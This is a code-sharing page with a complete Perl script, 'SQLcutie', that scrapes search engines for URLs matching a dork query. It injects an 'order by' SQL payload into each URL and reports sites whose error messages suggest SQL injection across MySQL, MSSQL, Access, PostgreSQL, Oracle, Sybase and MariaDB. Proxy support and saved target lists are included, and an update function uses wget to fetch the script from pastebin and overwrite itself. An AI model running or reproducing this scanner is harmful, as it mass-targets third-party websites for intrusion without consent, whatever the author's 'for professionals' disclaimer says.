Posted By

madfedora on 09/21/13


Tagged

mysql sql mssql SQLi sqlinjection dork dorking dorker


Versions (?)

SQLcutie


 / Published in: Perl
 

SQLcutie is a separated and improved dorker version of SQLcute. SQLcutie covers 10 different database types of parsing error, each specifically report to users.

Goal of this dorker is not to let script kiddies cause more damage, it's just an attempt to provide specific needs for security professionals.

  1. #!/usr/bin/perl
  2. =for comment
  3. *-----------------------------------------------------------*
  4. | |
  5. | SQLCutie 1.1 |
  6. | by MadFedora |
  7. | |
  8. | This is the separated dorker version of SQLCute |
  9. | With accurated vuln finding and wider DB ranges |
  10. | |
  11. | This script is constantly updated, check update |
  12. | function in help menu. |
  13. *-----------------------------------------------------------*
  14. =cut
  15. use LWP::UserAgent;
  16. use HTTP::Request;
  17. use Term::ANSIColor qw(:constants);
  18.  
  19. #-----------------------------------------------------------#
  20. # Help menu #
  21. #-----------------------------------------------------------#
  22.  
  23. sub help
  24. {
  25. system('clear');
  26. system('title SQLCutie 1.1');
  27. print BLUE, "[!] Usage : perl $0 <option>\n";
  28. print GREEN, "-----------------------------------";
  29. print BOLD, GREEN, "\n--|| Options\n\n", RESET;
  30. print GREEN, " --dork Dorking function (dorkhelp)\n";
  31. print GREEN, " --proxy Define a proxy to use (proxyhelp)\n";
  32. print " --output Save scan result in an outside file\n";
  33. print " --help Print this help manual\n";
  34. print " --readme README\n";
  35. print " --dorkhelp Print dork help manual\n";
  36. print " --proxyhelp Print proxy help manual\n";
  37. print " --update Update to latest version\n";
  38. print "-----------------------------------\n", RESET;
  39. exit();
  40. }
  41.  
  42. sub readme
  43. {
  44. system('clear');
  45. system('title SQLCutie 1.1');
  46. print BOLD,GREEN," \n SQLCutie ",YELLOW,"1.1\n",RESET;
  47. print "This project was started at ",YELLOW,"09/20/2013\n",RESET;
  48. print GREEN,"Improvement: \n",RESET;
  49. print BLUE,"-- Over 10 types of DB\n";
  50. print "-- Better dork response\n";
  51. print "-- More accurated error responses\n";
  52. print "-- Better help UI\n";
  53. print "-- Update support\n",RESET;
  54. print BOLD, GREEN, "If anyone looking toward to improve this piece of crap\nFeel free to do so!\n",RESET;
  55. print BLUE,"perl $0 --help\n\n";
  56. exit();
  57. }
  58.  
  59. sub dorkhelp
  60. {
  61. system('clear');
  62. system('title SQLCutie 1.1');
  63. print GREEN, "\n[?] Example: ./sqlcutie php?id=\n";
  64. print " ./sqlcutie php?id=+ottawa\n";
  65. print " ./sqlcutie inurl:php?id=+intitle:ottawa\n";
  66. print " ./sqlcutie intext:world+filetype:pl\n";
  67. print " ./sqlcutie funny+AND+joyful+asp?id=\n",RESET;
  68. print YELLOW,"[!] You can use basically any Google dork query except brackets\n",RESET;
  69. print BLUE,"perl $0 --help\n\n";
  70. exit();
  71. }
  72.  
  73. sub proxyhelp
  74. {
  75. system('clear');
  76. system('title SQLCutie 1.1');
  77. print GREEN,"\n[?] Example: ./sqlcutie --proxy ",BOLD,"http://127.0.0.1:9050/\n",RESET;
  78. print BLUE,"perl $0 --help\n\n";
  79. exit();
  80. }
  81.  
  82. sub update
  83. {
  84. system('clear');
  85. system('title SQLCutie 1.1');
  86. print GREEN,"\n[!] Updating...\n";
  87. system('rm -r sqlcutie ; wget http://pastebin.com/raw.php?i=NdVZ5HVX -O ./sqlcutie ; chmod u+x ./sqlcutie');
  88. print BOLD,"";
  89. system('echo "For what changed run: perl sqlcutie --readme"');
  90. print "\n",RESET;
  91. exit();
  92. }
  93.  
  94. sub variables
  95. {
  96. my $i=0;
  97. foreach (@ARGV)
  98. {
  99. if ($ARGV[$i] eq "--dork"){$search_dork = $ARGV[$i+1]}
  100. if ($ARGV[$i] eq "--output"){$vulnfile = $ARGV[$i+1]}
  101. if ($ARGV[$i] eq "--proxy"){$proxy = $ARGV[$i+1]}
  102. if ($ARGV[$i] eq "--help"){&help}
  103. if ($ARGV[$i] eq "--readme"){&readme}
  104. if ($ARGV[$i] eq "--dorkhelp"){&dorkhelp}
  105. if ($ARGV[$i] eq "--proxyhelp"){&proxyhelp}
  106. if ($ARGV[$i] eq "--update"){&update}
  107. $i++;
  108. }
  109. }
  110.  
  111. sub main
  112. {
  113. system('clear');
  114. system('title SQLCutie 1.1');
  115. print GREEN, " \n--------------------------------------\n";
  116. print BOLD," \n SQLCutie ",YELLOW,"1.1\n",RESET;
  117. print BLUE," \n madfedora";
  118. print " \n madfedora\@mail.riseup.net\n",RESET;
  119. print GREEN," \n--------------------------------------\n\n",RESET;
  120. if (@ARGV+1){print GREEN,"[?] For Help : ",BOLD,"perl $0 --help\n\n",RESET;}
  121. }
  122.  
  123. sub vulnscanner
  124. {
  125. checksearch();
  126. search1($search_dork);
  127. search2($search_dork);
  128. }
  129. sub checksearch
  130. {
  131. #my $request = HTTP::Request->new(GET => "http://www.google.com/search?hl=en&q=$search_dork&btnG=Search&start=10");
  132. my $request = HTTP::Request->new(GET => "http://www.search-results.com/web?q=$search_dork&s&hl=en&page=60");
  133. #-----------------------------------------------------------#
  134. # Change page numbers above #
  135. #-----------------------------------------------------------#
  136. my $useragent = LWP::UserAgent->new(agent => 'Mozilla/5.0 (Windows; U; Windows NT 6.1) AppleWebKit/531.6.2 (KHTML, like Gecko) Version/5.1 Safari/531.6.2' || 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_5_5 rv:6.0) Gecko/20100731 Firefox/3.6.8' || 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/5.1)');
  137. $useragent->proxy("http", "http://$proxy/") if defined($proxy);
  138. my $response = $useragent->request($request) ;
  139. my $result = $response->content;
  140. }
  141.  
  142. sub search1
  143. {
  144. my $dork = $_[0];
  145. for ($i=0;$i<200;$i=$i+10)
  146. {
  147. my $request = HTTP::Request->new(GET => "http://www.search-results.com/web?q=$search_dork&s&hl=en&page=$i");
  148. my $useragent = LWP::UserAgent->new(agent => 'Mozilla/5.0(X11; Linux i686) AppleWebKit/5310 (KHTML, like Gecko) Chrome/13.0.889.0 Safari/5310');
  149. $useragent->proxy("http", "http://$proxy/") if defined($proxy);
  150. my $response = $useragent->request($request) ;
  151. my $result = $response->content;
  152. while ($result =~ m/class=r><a href=\"(.*?)\" class=l>/g )
  153. {
  154. print BLUE, "[!] Dorking > $1\n", RESET;
  155. checkvuln($1)
  156. }
  157. }
  158. }
  159. sub search2
  160. {
  161. my $dork = $_[0];
  162. for ($i=0;$i<20;$i++)
  163. {
  164. my $request = HTTP::Request->new(GET => "http://uk.ask.com/web?q=$dork&page=$i&dm=all");
  165. my $useragent = LWP::UserAgent->new(agent => 'Mozilla/5.0');
  166. $useragent->proxy("http", "http://$proxy/") if defined($proxy);
  167. my $response = $useragent->request($request) ;
  168. my $result = $response->content;
  169. while ($result =~ m/<span id=\"r(.*)_u\" class=\"(.*)\">(.*)<\/span>/gi)
  170. {
  171. my $askurl ="http://".$3 ;
  172. print BLUE, "[!] Dorking > $askurl\n",RESET;
  173. checkvuln($askurl);
  174. }
  175. }
  176. }
  177.  
  178. sub checkvuln
  179. {
  180. my $scan_url = $_[0];
  181. my $link = $scan_url.'0+order+by+9999999--';
  182. my $ua = LWP::UserAgent->new();
  183. $ua->proxy("http", "http://$proxy/") if defined($proxy);
  184. my $req = $ua->get($link);
  185. my $fuzz = $req->content;
  186. #-----------------------------------------------------------#
  187. # MySQL #
  188. #-----------------------------------------------------------#
  189. if ($fuzz =~ m/mysql_num_rows/i || $fuzz =~ m/mysql_numrow/i)
  190.  
  191. {
  192. print BOLD, GREEN, "[!] MySQL Num Row -> $scan_url\n", RESET;
  193. if (defined($vulnfile))
  194. {
  195. push (@mysqlvuln,"$scan_url\n");
  196. }
  197. }
  198.  
  199. elsif ($fuzz =~ m/mysql_fetch_/i || $fuzz =~ m/mysql_fetch_array/i || $fuzz =~ m/FetchRow()/i|| $fuzz =~ m/GetArray()/i )
  200. {
  201. print BOLD, GREEN, "[!] MySQL Fetch (Array/Row) -> $scan_url\n", RESET;
  202. if (defined($vulnfile))
  203. {
  204. push (@mysqlvuln,"$scan_url\n");
  205. }
  206. }
  207.  
  208. elsif ($fuzz =~ m/Unexpected EOF found when reading file/i)
  209. {
  210. print BOLD, GREEN, "[!] MySQL EOF -> $scan_url\n", RESET;
  211. print BOLD, WHITE "[*] Possible Injection\n", RESET;
  212. if (defined($vulnfile))
  213. {
  214. push (@mysqlvuln,"$scan_url\n");
  215. }
  216. }
  217.  
  218. elsif ($fuzz =~ m/Triggers can not be created on system tables/i)
  219. {
  220. print BOLD, GREEN, "[!] MySQL NO TRIGGERS -> $scan_url\n", RESET;
  221. if (defined($vulnfile))
  222. {
  223. push (@mysqlvuln,"$scan_url\n");
  224. }
  225. }
  226. elsif ($fuzz =~ m/Can't get working directory/i)
  227. {
  228. print BOLD, GREEN, "[!] MySQL Directory -> $scan_url\n", RESET;
  229. if (defined($vulnfile))
  230. {
  231. push (@mysqlvuln,"$scan_url\n");
  232. }
  233. }
  234. elsif ($fuzz =~ m/You have an error in your SQL syntax/i || $fuzz =~ m/Query failed/i || $fuzz =~ m/SQL query failed/i || $fuzz =~ m/The used SELECT statements have a different number of columns/i)
  235. {
  236. print BOLD, GREEN, "[!] MySQL Error Misc -> $scan_url\n", RESET;
  237. print BOLD, WHITE "[*] Possible Injection\n", RESET;
  238. if (defined($vulnfile))
  239. {
  240. push (@mysqlvuln,"$scan_url\n");
  241. }
  242. }
  243. #-----------------------------------------------------------#
  244. # Microsoft OLE/ODBC/JET [MsSQL/Access] #
  245. #-----------------------------------------------------------#
  246. elsif ($fuzz =~ m/ODBC SQL Server Driver/i || $fuzz =~ m/ODBC Microsoft Access Driver/i || $fuzz =~ m/OLE DB Provider for ODBC/i)
  247. {
  248. print BOLD, GREEN, "[!] Microsoft ODBC [Access] -> $scan_url\n", RESET;
  249. if (defined($vulnfile))
  250. {
  251. push (@accessvuln,"$scan_url\n");
  252. }
  253. }
  254. elsif ($fuzz =~ m/Microsoft OLE DB Provider for SQL Server/i || $fuzz =~ m/Unclosed quotation mark/i)
  255. {
  256. print BOLD, GREEN, "[!] Microsoft OLE DB [MsSQL] -> $scan_url\n", RESET;
  257. print BOLD, WHITE "[*] Possible Injection\n", RESET;
  258. if (defined($vulnfile))
  259. {
  260. push (@mssqlvuln,"$scan_url\n");
  261. }
  262. }
  263. elsif ($fuzz =~ m/VBScript Runtime/i)
  264. {
  265. print BOLD, GREEN, "[!] VBScript Runtime -> $scan_url\n", RESET;
  266. print BOLD, YELLOW "[*] Not Injectable\n", RESET;
  267. if (defined($vulnfile))
  268. {
  269. push (@mssqlvuln,"$scan_url\n");
  270. }
  271. }
  272. elsif ($fuzz =~ m/Microsoft JET Database/i)
  273. {
  274. print BOLD, GREEN, "[!] Microsoft JET [Access] -> $scan_url\n", RESET;
  275. if (defined($vulnfile))
  276. {
  277. push (@accessvuln,"$scan_url\n");
  278. }
  279. }
  280. #-----------------------------------------------------------#
  281. # ADO DB #
  282. #-----------------------------------------------------------#
  283. elsif ($fuzz =~ m/Invalid Querystring/i)
  284. {
  285. print BOLD, GREEN, "[!] ADO DB Invalid Querystring -> $scan_url\n", RESET;
  286. if (defined($vulnfile))
  287. {
  288. push (@mssqlvuln,"$scan_url\n");
  289. }
  290. }
  291. elsif ($fuzz =~ m/ADODB.Field/i)
  292. {
  293. print BOLD, GREEN, "[!] ADO DB ADODB.Field -> $scan_url\n", RESET;
  294. if (defined($vulnfile))
  295. {
  296. push (@mssqlvuln,"$scan_url\n");
  297. }
  298. }
  299. elsif ($fuzz =~ m/ADODB.Command/i )
  300. {
  301. print BOLD, GREEN, "[!] ADO DB ADODB.Command -> $scan_url\n", RESET;
  302. if (defined($vulnfile))
  303. {
  304. push (@mssqlvuln,"$scan_url\n");
  305. }
  306. }
  307. elsif ($fuzz =~ m/BOF or EOF/i)
  308. {
  309. print BOLD, GREEN, "[!] ADO DB BOF or EOF -> $scan_url\n", RESET;
  310. if (defined($vulnfile))
  311. {
  312. push (@mssqlvuln,"$scan_url\n");
  313. }
  314. }
  315. #-----------------------------------------------------------#
  316. # PostgreSQL #
  317. #-----------------------------------------------------------#
  318. elsif ($fuzz =~ m/postgresql.util/i || $fuzz =~ m/psql: could not connect to server/i || $fuzz =~ m/psql: FATAL/i || $fuzz =~ m/dynamic_result_sets_returned/i || $fuzz =~ m/null_value_eliminated_in_set_function/i || $fuzz =~ m/ERROR: invalid input syntax for integer/i )
  319. {
  320. print BOLD, GREEN, "[!] PosgreSQL -> $scan_url\n", RESET;
  321. if (defined($vulnfile))
  322. {
  323. push (@mssqlvuln,"$scan_url\n");
  324. }
  325. }
  326. #-----------------------------------------------------------#
  327. # Oracle #
  328. #-----------------------------------------------------------#
  329. elsif ($fuzz =~ m/oracle.jdbc/i || $fuzz =~ m/system.data.oledb/i )
  330. {
  331. print BOLD, GREEN, "[!] JDBC -> $scan_url\n", RESET;
  332. if (defined($vulnfile))
  333. {
  334. push (@mssqlvuln,"$scan_url\n");
  335. }
  336. }
  337. #-----------------------------------------------------------#
  338. # Sybase #
  339. #-----------------------------------------------------------#
  340. elsif ($fuzz =~ m/Warning: sybase_query()/i || $fuzz =~ m/sybase_fetch_assoc()/i )
  341. {
  342. print BOLD, GREEN, "[!] Sybase -> $scan_url\n", RESET;
  343. if (defined($vulnfile))
  344. {
  345. push (@mssqlvuln,"$scan_url\n");
  346. }
  347. }
  348. #-----------------------------------------------------------#
  349. # MariaDB #
  350. #-----------------------------------------------------------#
  351. elsif ($fuzz =~ m/ERROR 1712 (HY000)/i )
  352. {
  353. print BOLD, GREEN, "[!] MariaDB Index Corruption -> $scan_url\n", RESET;
  354. if (defined($vulnfile))
  355. {
  356. push (@mssqlvuln,"$scan_url\n");
  357. }
  358. }
  359. elsif ($fuzz =~ m/ER_QUERY_EXCEEDED_ROWS_EXAMINED_LIMIT/i )
  360. {
  361. print BOLD, GREEN, "[!] MariaDB Query Excecution Corrupted -> $scan_url\n", RESET;
  362. if (defined($vulnfile))
  363. {
  364. push (@mssqlvuln,"$scan_url\n");
  365. }
  366. }
  367. elsif ($fuzz =~ m/ER_QUERY_CACHE_IS_GLOBALY_DISABLED/i )
  368. {
  369. print BOLD, GREEN, "[!] MariaDB Query cache is globally disabled -> $scan_url\n", RESET;
  370. if (defined($vulnfile))
  371. {
  372. push (@mssqlvuln,"$scan_url\n");
  373. }
  374. }
  375. elsif ($fuzz =~ m/ER_DYN_COL_IMPLEMENTATION_LIMIT/i )
  376. {
  377. print BOLD, GREEN, "[!] MariaDB Dynamic column implementation limit -> $scan_url\n", RESET;
  378. if (defined($vulnfile))
  379. {
  380. push (@mssqlvuln,"$scan_url\n");
  381. }
  382. }
  383. }
  384. variables();
  385. main();
  386.  
  387. if (defined($search_dork))
  388. {
  389. print BOLD,GREEN,"[+] Vulnerability Scan\n" ;
  390. print "[+] Dork : $search_dork\n\n\n",RESET;
  391. vulnscanner();
  392. if (defined($vulnfile))
  393. {
  394. open(vuln_file,">>$vulnfile") ;
  395. print vuln_file @mysqlvuln;
  396. print vuln_file @mssqlvuln;
  397. print vuln_file @accessvuln;
  398. close(vuln_file);
  399. print YELLOW,"[+] Result Saved to $vulnfile\n",RESET;
  400. exit();
  401. if (!defined($search_dork))
  402. {
  403. print YELLOW,"[!] Please enter the correct query, example ",BOLD,"inurl:php?id=+world\n",RESET;
  404. exit();
  405. }
  406. if (!defined($proxy))
  407. {
  408. print YELLOW,"[!] Please enter the correct proxy, example ",BOLD,"http://127.0.0.1:8080/\n",RESET;
  409. exit();
  410. }
  411. }
  412. }
  413. #-----------------------------------------------------------#
  414. # End #
  415. #-----------------------------------------------------------#

Report this snippet  

You need to login to post a comment.